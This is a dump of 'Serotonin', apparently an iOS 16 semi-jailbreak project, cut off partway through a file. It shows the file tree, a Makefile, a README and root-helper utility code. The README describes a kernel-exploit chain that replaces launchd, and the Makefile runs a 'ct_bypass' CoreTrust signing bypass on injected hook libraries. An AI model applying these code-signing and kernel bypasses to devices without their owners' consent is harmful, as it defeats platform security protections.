Repository: hrtowii/Serotonin Branch: A12restart Commit: a2a05595f301 Files: 191 Total size: 21.3 MB Directory structure: gitextract_ym5s8a6q/ ├── .gitignore ├── .gitmodules ├── Makefile ├── README.md ├── RootHelperSample/ │ ├── CoreServices.h │ ├── Makefile │ ├── RemoteLog.h │ ├── RootHelperSample.xcodeproj/ │ │ └── project.pbxproj │ ├── TSUtil.h │ ├── TSUtil.m │ ├── control │ ├── entitlements.plist │ ├── external/ │ │ ├── include/ │ │ │ └── choma/ │ │ │ ├── Base64.h │ │ │ ├── BufferedStream.h │ │ │ ├── CSBlob.h │ │ │ ├── CodeDirectory.h │ │ │ ├── FAT.h │ │ │ ├── FileStream.h │ │ │ ├── Host.h │ │ │ ├── MachO.h │ │ │ ├── MachOByteOrder.h │ │ │ ├── MachOLoadCommand.h │ │ │ ├── MemoryStream.h │ │ │ ├── PatchFinder.h │ │ │ ├── SignOSSL.h │ │ │ ├── Signing.h │ │ │ └── Util.h │ │ └── lib/ │ │ ├── libchoma.a │ │ └── libcrypto.a │ ├── insert_dylib.h │ ├── insert_dylib.m │ ├── launchdshim/ │ │ ├── .gitignore │ │ ├── SpringBoardShim/ │ │ │ ├── Makefile │ │ │ ├── SpringBoardEnts.plist │ │ │ ├── SpringBoardEntsBedtime.plist │ │ │ ├── SpringBoardHook/ │ │ │ │ ├── .gitignore │ │ │ │ ├── Makefile │ │ │ │ ├── SpringBoardHook.plist │ │ │ │ ├── Tweak.x │ │ │ │ ├── build.sh │ │ │ │ └── control │ │ │ ├── build.sh │ │ │ ├── main.c │ │ │ └── springboardshimsignedinjected │ │ ├── build.sh │ │ ├── launchdentitlements.plist │ │ └── launchdhook/ │ │ ├── Frameworks/ │ │ │ └── IOMobileFramebuffer.framework/ │ │ │ └── IOMobileFramebuffer.tbd │ │ ├── IOMobileFramebuffer.h │ │ ├── LICENCE │ │ ├── Makefile │ │ ├── README.md │ │ ├── build.sh │ │ ├── control │ │ ├── entitlements.plist │ │ ├── fishhook.c │ │ ├── fishhook.h │ │ ├── main.m │ │ └── verbose/ │ │ ├── IOMobileFramebuffer.h │ │ ├── console/ │ │ │ ├── iso_font.c │ │ │ ├── msgbuf.h │ │ │ ├── serial_protos.h │ │ │ ├── video_console.c │ │ │ ├── video_console.h │ │ │ └── video_scroll.c │ │ └── verbose_boot.m │ └── main.m ├── Serotonin.xcodeproj/ │ ├── project.pbxproj │ ├── project.xcworkspace/ │ │ ├── contents.xcworkspacedata │ │ ├── xcshareddata/ │ │ │ └── IDEWorkspaceChecks.plist │ │ └── xcuserdata/ │ │ └── hariz.xcuserdatad/ │ │ └── UserInterfaceState.xcuserstate │ └── xcuserdata/ │ ├── hariz.xcuserdatad/ │ │ └── xcschemes/ │ │ └── xcschememanagement.plist │ └── ibarahime.xcuserdatad/ │ ├── xcdebugger/ │ │ └── Breakpoints_v2.xcbkptlist │ └── xcschemes/ │ └── xcschememanagement.plist ├── build.sh ├── ent.plist └── usprebooter/ ├── Assets.xcassets/ │ ├── AccentColor.colorset/ │ │ └── Contents.json │ ├── AppIcon.appiconset/ │ │ └── Contents.json │ ├── Contents.json │ ├── accent.colorset/ │ │ └── Contents.json │ ├── alfienick.imageset/ │ │ └── Contents.json │ ├── bedtime.imageset/ │ │ └── Contents.json │ ├── duy.imageset/ │ │ └── Contents.json │ ├── fish.imageset/ │ │ └── Contents.json │ ├── haxi0.imageset/ │ │ └── Contents.json │ └── htrowii.imageset/ │ └── Contents.json ├── ContentView.swift ├── External/ │ ├── FluidGradient/ │ │ ├── BlobLayer.swift │ │ ├── CGPoint+Extensions.swift │ │ ├── FluidGradient.swift │ │ ├── FluidGradientView.swift │ │ └── ResizableLayer.swift │ ├── SwiftBackports/ │ │ ├── Backport.swift │ │ ├── CoreTransferable/ │ │ │ ├── Representations/ │ │ │ │ ├── Codable+Representation.swift │ │ │ │ ├── Data+Representation.swift │ │ │ │ ├── File+Representations.swift │ │ │ │ ├── Never+Representation.swift │ │ │ │ ├── Tuple+Representation.swift │ │ │ │ └── _ConditionalRepresentation.swift │ │ │ ├── Support/ │ │ │ │ ├── NSItemProvider+Transferable.swift │ │ │ │ ├── ReceivedTransferredFile.swift │ │ │ │ ├── SentTransferredFile.swift │ │ │ │ └── Visibility.swift │ │ │ ├── TransferRepresentationBuilder.swift │ │ │ ├── Transferable.swift │ │ │ ├── TransferableRepresentation.swift │ │ │ └── Transferables/ │ │ │ ├── AttributedString+Transferable.swift │ │ │ ├── Data+Transferable.swift │ │ │ ├── Never+Transferable.swift │ │ │ ├── String+Transferable.swift │ │ │ └── URL+Transferable.swift │ │ ├── URLSession/ │ │ │ └── URLSession+Async.swift │ │ └── UniformTypeIdentifiers/ │ │ ├── CoreTypes.swift │ │ ├── UTTagClass.swift │ │ └── UTType.swift │ └── SwiftUIBackports/ │ ├── Internal/ │ │ ├── Environment+String.swift │ │ ├── Environment.swift │ │ ├── Inspect.swift │ │ ├── NSItemProvider+Async.swift │ │ ├── OwningController.swift │ │ ├── Platforms.swift │ │ ├── SafeArea.swift │ │ ├── String+LocalizationKey.swift │ │ ├── UIScene.swift │ │ └── VisualEffects/ │ │ ├── VisualEffect+iOS.swift │ │ └── VisualEffect+macOS.swift │ ├── UIBackport.swift │ └── iOS/ │ └── Presentation/ │ └── Detents.swift ├── Info.plist ├── Log.swift ├── Private Headers I stole from the macOS SDK/ │ ├── bootstrap.h │ └── xpc/ │ ├── activity.h │ ├── availability.h │ ├── base.h │ ├── debug.h │ ├── endpoint.h │ ├── launch.h │ ├── listener.h │ ├── rich_error.h │ ├── session.h │ ├── xpc.h │ └── xpc_connection.h ├── TheCoolerContentView.swift ├── boot-happy.jp2 ├── boot-sad.jp2 ├── ct_bypass_signed ├── fun/ │ ├── cs_blobs.h │ ├── cs_blobs.m │ ├── dir.h │ ├── dir.m │ ├── fun.h │ ├── fun.m │ ├── krw.c │ ├── krw.h │ ├── offsets.h │ ├── offsets.m │ ├── proc.c │ ├── proc.h │ ├── thanks_opa334dev_htrowii.h │ ├── thanks_opa334dev_htrowii.m │ ├── utils.h │ ├── utils.m │ ├── vnode.h │ └── vnode.m ├── ldid ├── libkfd/ │ ├── common.h │ ├── info/ │ │ ├── dynamic_info.h │ │ └── static_info.h │ ├── info.h │ ├── krkw/ │ │ ├── kread/ │ │ │ ├── kread_kqueue_workloop_ctl.h │ │ │ └── kread_sem_open.h │ │ └── kwrite/ │ │ ├── kwrite_dup.h │ │ └── kwrite_sem_open.h │ ├── krkw.h │ ├── perf.h │ ├── puaf/ │ │ ├── landa.h │ │ ├── physpuppet.h │ │ └── smith.h │ └── puaf.h ├── libkfd.h ├── memoryControl.h ├── memoryControl.m ├── overwriter.h ├── overwriter.m ├── troller.h ├── troller.m ├── usprebooter-Bridging-Header.h ├── usprebooterApp.swift ├── util.h ├── util.m ├── vm_unaligned_copy_switch_race.c └── vm_unaligned_copy_switch_race.h ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitignore ================================================ build build/ .theos Payload .DS_Store usprebooter.xcodeproj/xcuserdata usprebooter.xcodeproj/project.xcworkspace/xcuserdata *.ipa *.tipa RootHelperSample/RootHelperSample.xcodeproj/xcuserdata RootHelperSample/build RootHelperSample/launchdshim/launchdhook/.theos apple-include ChOma_host ================================================ FILE: .gitmodules ================================================ [submodule "ChOma"] path = ChOma url = https://github.com/opa334/ChOma ================================================ FILE: Makefile ================================================ CC = clang SHELL = /usr/bin/env bash LDID = ldid MACOSX_SYSROOT = $(shell xcrun -sdk macosx --show-sdk-path) TARGET_SYSROOT = $(shell xcrun -sdk iphoneos --show-sdk-path) all: Serotonin.tipa Serotonin.tipa: $(wildcard **/*.c **/*.m **/*.swift **/*.plist **/*.xml) echo "[*] Building ChOma for host" $(MAKE) -C ChOma cp -r ChOma ChOma_host echo "[*] Building ChOma for target" $(MAKE) -C ChOma TARGET=ios echo "[*] Building fastPathSign" $(MAKE) -C RootHelperSample/Exploits/fastPathSign echo "[*] Building lunchd hook" $(MAKE) -C RootHelperSample/launchdshim/launchdhook echo "[*] Signing lunchd hook" $(shell test -f RootHelperSample/launchdshim/launchdhook/launchdhooksigned.dylib || ./ChOma_host/output/tests/ct_bypass -i RootHelperSample/launchdshim/launchdhook/.theos/obj/debug/launchdhook.dylib -o RootHelperSample/launchdshim/launchdhook/launchdhooksigned.dylib) echo "[*] Building SpringBoard Hook" $(MAKE) -C RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook echo "[*] Signing SB hook" $(shell test -f RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/springboardhooksigned.dylib || ./ChOma_host/output/tests/ct_bypass -i RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/.theos/obj/debug/SpringBoardHook.dylib -o RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/springboardhooksigned.dylib) # jank workaround at best, can someone else please fix this weird file dependency? – bomberfish echo "[*] Copying fastPathSign" mkdir -p ChOma/output/ios/tests cp RootHelperSample/Exploits/fastPathSign/fastPathSign ChOma/output/ios/tests echo "[*] Building Serotonin" xcodebuild clean build -project Serotonin.xcodeproj -sdk iphoneos -configuration Release CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGNING_ALLOWED="NO" echo "[*] Done building. Packaging for TS..." $(MAKE) -C RootHelperSample rm -rf Payload rm -rf Serotonin.tipa mkdir Payload cp -a build/Release-iphoneos/usprebooter.app Payload cp RootHelperSample/.theos/obj/debug/arm64/trolltoolsroothelper Payload/usprebooter.app/trolltoolsroothelper install -m755 RootHelperSample/launchdshim/launchdhook/launchdhooksigned.dylib Payload/usprebooter.app/launchdhooksigned.dylib install -m755 RootHelperSample/launchdshim/SpringBoardShim/SpringBoardHook/springboardhooksigned.dylib Payload/usprebooter.app/springboardhooksigned.dylib $(LDID) -S./RootHelperSample/entitlements.plist -Cadhoc Payload/usprebooter.app/{fastPathSign,ldid,trolltoolsroothelper} $(LDID) -Sent.plist -Cadhoc Payload/usprebooter.app/usprebooter zip -vr9 Serotonin.tipa Payload/ -x "*.DS_Store" apple-include: mkdir -p apple-include/{bsm,objc,os/internal,sys,firehose,CoreFoundation,FSEvents,IOSurface,IOKit/kext,libkern,kern,arm,{mach/,}machine,CommonCrypto,Security,CoreSymbolication,Kernel/{kern,IOKit,libkern},rpc,rpcsvc,xpc/private,ktrace,mach-o,dispatch} cp -af $(MACOSX_SYSROOT)/usr/include/{arpa,bsm,hfs,net,xpc,netinet,servers,timeconv.h,launch.h} apple-include cp -af $(MACOSX_SYSROOT)/usr/include/objc/objc-runtime.h apple-include/objc cp -af $(MACOSX_SYSROOT)/usr/include/libkern/{OSDebug.h,OSKextLib.h,OSReturn.h,OSThermalNotification.h,OSTypes.h,machine} apple-include/libkern cp -af $(MACOSX_SYSROOT)/usr/include/kern apple-include cp -af $(MACOSX_SYSROOT)/usr/include/sys/{tty*,ptrace,kern*,random,reboot,user,vnode,disk,vmmeter,conf}.h apple-include/sys cp -af $(MACOSX_SYSROOT)/System/Library/Frameworks/Kernel.framework/Versions/Current/Headers/sys/disklabel.h apple-include/sys cp -af $(MACOSX_SYSROOT)/System/Library/Frameworks/IOKit.framework/Headers/{AppleConvergedIPCKeys.h,IOBSD.h,IOCFBundle.h,IOCFPlugIn.h,IOCFURLAccess.h,IOKitServer.h,IORPC.h,IOSharedLock.h,IOUserServer.h,audio,avc,firewire,graphics,hid,hidsystem,i2c,iokitmig.h,kext,ndrvsupport,network,ps,pwr_mgt,sbp2,scsi,serial,storage,stream,usb,video} apple-include/IOKit cp -af $(MACOSX_SYSROOT)/System/Library/Frameworks/Security.framework/Headers/{mds_schema,oidsalg,SecKeychainSearch,certextensions,Authorization,eisl,SecDigestTransform,SecKeychainItem,oidscrl,cssmcspi,CSCommon,cssmaci,SecCode,CMSDecoder,oidscert,SecRequirement,AuthSession,SecReadTransform,oids,cssmconfig,cssmkrapi,SecPolicySearch,SecAccess,cssmtpi,SecACL,SecEncryptTransform,cssmapi,cssmcli,mds,x509defs,oidsbase,SecSignVerifyTransform,cssmspi,cssmkrspi,SecTask,cssmdli,SecAsn1Coder,cssm,SecTrustedApplication,SecCodeHost,SecCustomTransform,oidsattr,SecIdentitySearch,cssmtype,SecAsn1Types,emmtype,SecTransform,SecTrustSettings,SecStaticCode,emmspi,SecTransformReadTransform,SecKeychain,SecDecodeTransform,CodeSigning,AuthorizationPlugin,cssmerr,AuthorizationTags,CMSEncoder,SecEncodeTransform,SecureDownload,SecAsn1Templates,AuthorizationDB,SecCertificateOIDs,cssmapple}.h apple-include/Security cp -af $(MACOSX_SYSROOT)/usr/include/{ar,bootstrap,launch,libc,libcharset,localcharset,nlist,NSSystemDirectories,tzfile,vproc}.h apple-include cp -af $(MACOSX_SYSROOT)/usr/include/mach/{*.defs,{mach_vm,shared_region}.h} apple-include/mach cp -af $(MACOSX_SYSROOT)/usr/include/mach/machine/*.defs apple-include/mach/machine cp -af $(MACOSX_SYSROOT)/usr/include/rpc/pmap_clnt.h apple-include/rpc cp -af $(MACOSX_SYSROOT)/usr/include/rpcsvc/yp{_prot,clnt}.h apple-include/rpcsvc cp -af $(TARGET_SYSROOT)/usr/include/mach/machine/thread_state.h apple-include/mach/machine cp -af $(TARGET_SYSROOT)/usr/include/mach/arm apple-include/mach cp -af $(MACOSX_SYSROOT)/System/Library/Frameworks/IOKit.framework/Headers/* apple-include/IOKit cp -af $(MACOSX_SYSROOT)/System/Library/Frameworks/IOSurface.framework/Headers/* apple-include/IOSurface gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/stdlib.h > apple-include/stdlib.h gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/time.h > apple-include/time.h gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/unistd.h > apple-include/unistd.h gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/mach/task.h > apple-include/mach/task.h gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/mach/mach_host.h > apple-include/mach/mach_host.h gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/ucontext.h > apple-include/ucontext.h gsed -E s/'__IOS_PROHIBITED|__TVOS_PROHIBITED|__WATCHOS_PROHIBITED'//g < $(TARGET_SYSROOT)/usr/include/signal.h > apple-include/signal.h gsed -E /'__API_UNAVAILABLE'/d < $(TARGET_SYSROOT)/usr/include/pthread.h > apple-include/pthread.h @if [ -f $(TARGET_SYSROOT)/System/Library/Frameworks/CoreFoundation.framework/Headers/CFUserNotification.h ]; then gsed -E 's/API_UNAVAILABLE\(ios, watchos, tvos\)//g' < $(TARGET_SYSROOT)/System/Library/Frameworks/CoreFoundation.framework/Headers/CFUserNotification.h > apple-include/CoreFoundation/CFUserNotification.h; fi gsed -i -E s/'__API_UNAVAILABLE\(.*\)'// apple-include/IOKit/IOKitLib.h clean: rm -rf Payload build RootHelperSample/.theos apple-include RootHelperSample/build FUCK.tipa Serotonin.tipa .PHONY: all clean ================================================ FILE: README.md ================================================ # This repository's code is now unmaintained and is merged into [the new Serotonin fork with Mineek](https://github.com/mineek/Serotonin)

Serotonin
not/semi-jailbreak

Supports iOS/iPadOS 16.2 - 16.6.1
## How do I use this? To use this app, you need to be on a supported version (mentioned above), and have [TrollStore](https://github.com/opa334/TrollStore/) installed. You can follow [this guide](https://ios.cfw.guide/installing-trollstore/) to install it on your device. Please note that this tool doesn't support iOS 17.0 despite of it having TrollStore. 1. Download and install [Bootstrap from RootHide](https://github.com/RootHide/Bootstrap) 2. Install ElleKit from Sileo 3. Download the `.tipa` file from the [latest release](https://github.com/hrtowii/Serotonin/releases/latest) 4. Install the downloaded file in TrollStore 5. Open the app and press the Jelbrek button. Your device should userspace reboot, and you should be (not/semi) jailbroken! ## How was this done? - It replaces launchd by searching through /sbin's vp_namecache, finds launchd's name cache and kwrites it with a patch to `lunchd`, our patched `launchd` (*you can have a look at a better explanation from AlfieCG [here](https://www.reddit.com/r/jailbreak/comments/18zehl2/comment/kgi5ya3/)*) - Patched launchd hooks posix_spawnp of SpringBoard and execs our own SpringBoard with springboardhook.dylib - Springboardhook loads in tweaks, ellekit, etc. - CoreTrust Bug found by [AlfieCG](https://github.com/alfiecg24) - [KFD Exploit](https://github.com/felix-pb/kfd) ## TODO - Try adding support for lower iOS versions by overwriting NSGetExecutablePath - Add support for arm64 - Add a boot splash screen (SOON) - Fix some Makefile jankiness - Fix `puaf_pages` picker crash in new UI ## Credits - [DuyKhanhTran](https://github.com/khanhduytran0) - launchd and SpringBoard hooks - [NSBedtime](https://twitter.com/NSBedtime) - initial launchdhax, helped out a ton! - [AlfieCG](https://github.com/alfiecg24) - helped out a ton! - [Nick Chan](https://github.com/asdfugil) - helped out a ton! - [BomberFish](https://github.com/BomberFish) - Icon, new UI, `lunchd` name idea :trollface: - [haxi0](https://github.com/haxi0) - old UI - [Evelyne](https://github.com/evelyneee) for showing it was possible. ================================================ FILE: RootHelperSample/CoreServices.h ================================================ @interface LSBundleProxy @property (nonatomic,readonly) NSString * bundleIdentifier; @property (nonatomic) NSURL* dataContainerURL; -(NSString*)localizedName; @end @interface LSApplicationProxy : LSBundleProxy + (instancetype)applicationProxyForIdentifier:(NSString*)identifier; @property NSURL* bundleURL; @property NSString* bundleType; @property NSString* canonicalExecutablePath; @property (nonatomic,readonly) NSDictionary* groupContainerURLs; @property (nonatomic,readonly) NSArray* plugInKitPlugins; @property (getter=isInstalled,nonatomic,readonly) BOOL installed; @property (getter=isPlaceholder,nonatomic,readonly) BOOL placeholder; @property (getter=isRestricted,nonatomic,readonly) BOOL restricted; @property (nonatomic,readonly) NSSet * claimedURLSchemes; @end @interface LSApplicationWorkspace : NSObject + (instancetype)defaultWorkspace; - (BOOL)registerApplicationDictionary:(NSDictionary*)dict; - (BOOL)unregisterApplication:(id)arg1; - (BOOL)_LSPrivateRebuildApplicationDatabasesForSystemApps:(BOOL)arg1 internal:(BOOL)arg2 user:(BOOL)arg3; - (BOOL)uninstallApplication:(NSString*)arg1 withOptions:(id)arg2; - (BOOL)openApplicationWithBundleID:(NSString *)arg1 ; - (void)enumerateApplicationsOfType:(NSUInteger)type block:(void (^)(LSApplicationProxy*))block; @end @interface LSEnumerator : NSEnumerator @property (nonatomic,copy) NSPredicate * predicate; + (instancetype)enumeratorForApplicationProxiesWithOptions:(NSUInteger)options; @end @interface LSPlugInKitProxy : LSBundleProxy @property (nonatomic,readonly) NSString* pluginIdentifier; @property (nonatomic,readonly) NSDictionary * pluginKitDictionary; + (instancetype)pluginKitProxyForIdentifier:(NSString*)arg1; @end @interface MCMContainer : NSObject + (id)containerWithIdentifier:(id)arg1 createIfNecessary:(BOOL)arg2 existed:(BOOL*)arg3 error:(id*)arg4; @property (nonatomic,readonly) NSURL * url; @end @interface MCMDataContainer : MCMContainer @end @interface MCMAppDataContainer : MCMDataContainer @end @interface MCMAppContainer : MCMContainer @end @interface MCMPluginKitPluginDataContainer : MCMDataContainer @end ================================================ FILE: RootHelperSample/Makefile ================================================ TARGET := iphone:clang:16.5:14.0 ARCHS = arm64 include $(THEOS)/makefiles/common.mk TOOL_NAME = trolltoolsroothelper trolltoolsroothelper_FILES = $(wildcard *.m) Exploits/fastPathSign/src/coretrust_bug.c Exploits/fastPathSign/src/codesign.m trolltoolsroothelper_LDFLAGS = -Lexternal/lib -lcrypto -lchoma trolltoolsroothelper_CFLAGS = -fobjc-arc $(shell pkg-config --cflags libcrypto) -Iexternal/include -Wmissing-braces -IExploits/fastPathSign/src trolltoolsroothelper_CODESIGN_FLAGS = -Sentitlements.plist trolltoolsroothelper_INSTALL_PATH = /usr/local/bin trolltoolsroothelper_LIBRARIES = archive trolltoolsroothelper_PRIVATE_FRAMEWORKS = SpringBoardServices BackBoardServices MobileCoreServices MobileContainerManager IOKit include $(THEOS_MAKE_PATH)/tool.mk ================================================ FILE: RootHelperSample/RemoteLog.h ================================================ #ifndef _REMOTE_LOG_H_ #define _REMOTE_LOG_H_ #import #import #import #import // change this to match your destination (server) IP address #define RLOG_IP_ADDRESS "192.168.0.24" #define RLOG_PORT 11909 __attribute__((unused)) static void RLogv(NSString* format, va_list args) { NSString* str = [[NSString alloc] initWithFormat:format arguments:args]; int sd = socket(PF_INET, SOCK_DGRAM, IPPROTO_UDP); if (sd <= 0) { NSLog(@"[RemoteLog] Error: Could not open socket"); return; } int broadcastEnable = 1; int ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &broadcastEnable, sizeof(broadcastEnable)); if (ret) { NSLog(@"[RemoteLog] Error: Could not open set socket to broadcast mode"); close(sd); return; } struct sockaddr_in broadcastAddr; memset(&broadcastAddr, 0, sizeof broadcastAddr); broadcastAddr.sin_family = AF_INET; inet_pton(AF_INET, RLOG_IP_ADDRESS, &broadcastAddr.sin_addr); broadcastAddr.sin_port = htons(RLOG_PORT); char* request = (char*)[str UTF8String]; ret = sendto(sd, request, strlen(request), 0, (struct sockaddr*)&broadcastAddr, sizeof broadcastAddr); if (ret < 0) { NSLog(@"[RemoteLog] Error: Could not send broadcast"); close(sd); return; } close(sd); } __attribute__((unused)) static void RLog(NSString* format, ...) { va_list args; va_start(args, format); RLogv(format, args); va_end(args); } #endif ================================================ FILE: RootHelperSample/RootHelperSample.xcodeproj/project.pbxproj ================================================ // !$*UTF8*$! { archiveVersion = 1; classes = { }; objectVersion = 56; objects = { /* Begin PBXFileReference section */ C82AFEFB2B1762CD0070EA49 /* .DS_Store */ = {isa = PBXFileReference; lastKnownFileType = file; path = .DS_Store; sourceTree = ""; }; C82AFEFC2B1762CD0070EA49 /* uicache.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = uicache.h; sourceTree = ""; }; C82AFEFD2B1762CD0070EA49 /* .theos */ = {isa = PBXFileReference; lastKnownFileType = folder; path = .theos; sourceTree = ""; }; C82AFEFE2B1762CD0070EA49 /* Makefile */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.make; path = Makefile; sourceTree = ""; }; C82AFEFF2B1762CD0070EA49 /* entitlements.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist; path = entitlements.plist; sourceTree = ""; }; C82AFF002B1762CD0070EA49 /* TSUtil.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = TSUtil.m; sourceTree = ""; }; C82AFF012B1762CD0070EA49 /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = ""; }; C82AFF022B1762CD0070EA49 /* uicache.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = uicache.m; sourceTree = ""; }; C82AFF032B1762CD0070EA49 /* TSUtil.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = TSUtil.h; sourceTree = ""; }; C82AFF042B1762CD0070EA49 /* CoreServices.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = CoreServices.h; sourceTree = ""; }; C82AFF052B1762CD0070EA49 /* RemoteLog.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = RemoteLog.h; sourceTree = ""; }; C82AFF062B1762CD0070EA49 /* control */ = {isa = PBXFileReference; lastKnownFileType = text; path = control; sourceTree = ""; }; /* End PBXFileReference section */ /* Begin PBXGroup section */ C82AFEF52B1762CD0070EA49 = { isa = PBXGroup; children = ( C82AFEFB2B1762CD0070EA49 /* .DS_Store */, C82AFEFC2B1762CD0070EA49 /* uicache.h */, C82AFEFD2B1762CD0070EA49 /* .theos */, C82AFEFE2B1762CD0070EA49 /* Makefile */, C82AFEFF2B1762CD0070EA49 /* entitlements.plist */, C82AFF002B1762CD0070EA49 /* TSUtil.m */, C82AFF012B1762CD0070EA49 /* main.m */, C82AFF022B1762CD0070EA49 /* uicache.m */, C82AFF032B1762CD0070EA49 /* TSUtil.h */, C82AFF042B1762CD0070EA49 /* CoreServices.h */, C82AFF052B1762CD0070EA49 /* RemoteLog.h */, C82AFF062B1762CD0070EA49 /* control */, ); sourceTree = ""; }; /* End PBXGroup section */ /* Begin PBXLegacyTarget section */ C82AFEFA2B1762CD0070EA49 /* RootHelperSample */ = { isa = PBXLegacyTarget; buildArgumentsString = "$(ACTION)"; buildConfigurationList = C82AFF072B1762CD0070EA49 /* Build configuration list for PBXLegacyTarget "RootHelperSample" */; buildPhases = ( ); buildToolPath = "bash /Users/ibarahime/usprebooter/build.sh"; buildWorkingDirectory = /Users/ibarahime/usprebooter/RootHelperSample; dependencies = ( ); name = RootHelperSample; passBuildSettingsInEnvironment = 1; productName = RootHelperSample; }; /* End PBXLegacyTarget section */ /* Begin PBXProject section */ C82AFEF62B1762CD0070EA49 /* Project object */ = { isa = PBXProject; attributes = { BuildIndependentTargetsInParallel = 1; }; buildConfigurationList = C82AFEF92B1762CD0070EA49 /* Build configuration list for PBXProject "RootHelperSample" */; compatibilityVersion = "Xcode 14.0"; developmentRegion = en; hasScannedForEncodings = 0; knownRegions = ( en, Base, ); mainGroup = C82AFEF52B1762CD0070EA49; projectDirPath = ""; projectRoot = ""; targets = ( C82AFEFA2B1762CD0070EA49 /* RootHelperSample */, ); }; /* End PBXProject section */ /* Begin XCBuildConfiguration section */ C82AFEF72B1762CD0070EA49 /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { ARCHS = "$(ARCHS_STANDARD_32_BIT)"; COPY_PHASE_STRIP = NO; GCC_WARN_ABOUT_RETURN_TYPE = YES; GCC_WARN_UNUSED_VARIABLE = YES; ONLY_ACTIVE_ARCH = YES; SDKROOT = macosx10.6; }; name = Debug; }; C82AFEF82B1762CD0070EA49 /* Release */ = { isa = XCBuildConfiguration; buildSettings = { ARCHS = "$(ARCHS_STANDARD_32_BIT)"; COPY_PHASE_STRIP = YES; GCC_WARN_ABOUT_RETURN_TYPE = YES; GCC_WARN_UNUSED_VARIABLE = YES; SDKROOT = macosx10.6; }; name = Release; }; C82AFF082B1762CD0070EA49 /* Debug */ = { isa = XCBuildConfiguration; buildSettings = { COPY_PHASE_STRIP = NO; DEBUGGING_SYMBOLS = YES; GCC_DYNAMIC_NO_PIC = NO; GCC_ENABLE_FIX_AND_CONTINUE = YES; GCC_GENERATE_DEBUGGING_SYMBOLS = YES; GCC_OPTIMIZATION_LEVEL = 0; OTHER_CFLAGS = ""; OTHER_LDFLAGS = ""; PRODUCT_NAME = RootHelperSample; }; name = Debug; }; C82AFF092B1762CD0070EA49 /* Release */ = { isa = XCBuildConfiguration; buildSettings = { COPY_PHASE_STRIP = YES; DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; GCC_ENABLE_FIX_AND_CONTINUE = NO; OTHER_CFLAGS = ""; OTHER_LDFLAGS = ""; PRODUCT_NAME = RootHelperSample; }; name = Release; }; /* End XCBuildConfiguration section */ /* Begin XCConfigurationList section */ C82AFEF92B1762CD0070EA49 /* Build configuration list for PBXProject "RootHelperSample" */ = { isa = XCConfigurationList; buildConfigurations = ( C82AFEF72B1762CD0070EA49 /* Debug */, C82AFEF82B1762CD0070EA49 /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; C82AFF072B1762CD0070EA49 /* Build configuration list for PBXLegacyTarget "RootHelperSample" */ = { isa = XCConfigurationList; buildConfigurations = ( C82AFF082B1762CD0070EA49 /* Debug */, C82AFF092B1762CD0070EA49 /* Release */, ); defaultConfigurationIsVisible = 0; defaultConfigurationName = Release; }; /* End XCConfigurationList section */ }; rootObject = C82AFEF62B1762CD0070EA49 /* Project object */; } ================================================ FILE: RootHelperSample/TSUtil.h ================================================ @import Foundation; #import "CoreServices.h" #define TrollStoreErrorDomain @"TrollStoreErrorDomain" extern void chineseWifiFixup(void); extern void loadMCMFramework(void); extern NSString* safe_getExecutablePath(); extern NSString* rootHelperPath(void); extern NSString* getNSStringFromFile(int fd); extern void printMultilineNSString(NSString* stringToPrint); extern int spawnRoot(NSString* path, NSArray* args, NSString** stdOut, NSString** stdErr); extern void killall(NSString* processName); extern void respring(void); char* getPatchedLaunchdCopy(void); ================================================ FILE: RootHelperSample/TSUtil.m ================================================ #import "TSUtil.h" #import #import #import #include @interface PSAppDataUsagePolicyCache : NSObject + (instancetype)sharedInstance; - (void)setUsagePoliciesForBundle:(NSString*)bundleId cellular:(BOOL)cellular wifi:(BOOL)wifi; @end #define POSIX_SPAWN_PERSONA_FLAGS_OVERRIDE 1 extern int posix_spawnattr_set_persona_np(const posix_spawnattr_t* __restrict, uid_t, uint32_t); extern int posix_spawnattr_set_persona_uid_np(const posix_spawnattr_t* __restrict, uid_t); extern int posix_spawnattr_set_persona_gid_np(const posix_spawnattr_t* __restrict, uid_t); void loadMCMFramework(void) { static dispatch_once_t onceToken; dispatch_once (&onceToken, ^{ NSBundle* mcmBundle = [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/MobileContainerManager.framework"]; [mcmBundle load]; }); } extern char*** _NSGetArgv(); NSString* safe_getExecutablePath() { char* executablePathC = **_NSGetArgv(); return [NSString stringWithUTF8String:executablePathC]; } #ifdef EMBEDDED_ROOT_HELPER NSString* rootHelperPath(void) { return safe_getExecutablePath(); } #else NSString* rootHelperPath(void) { return [[NSBundle mainBundle].bundlePath stringByAppendingPathComponent:@"trolltoolsroothelper"]; } #endif NSString* 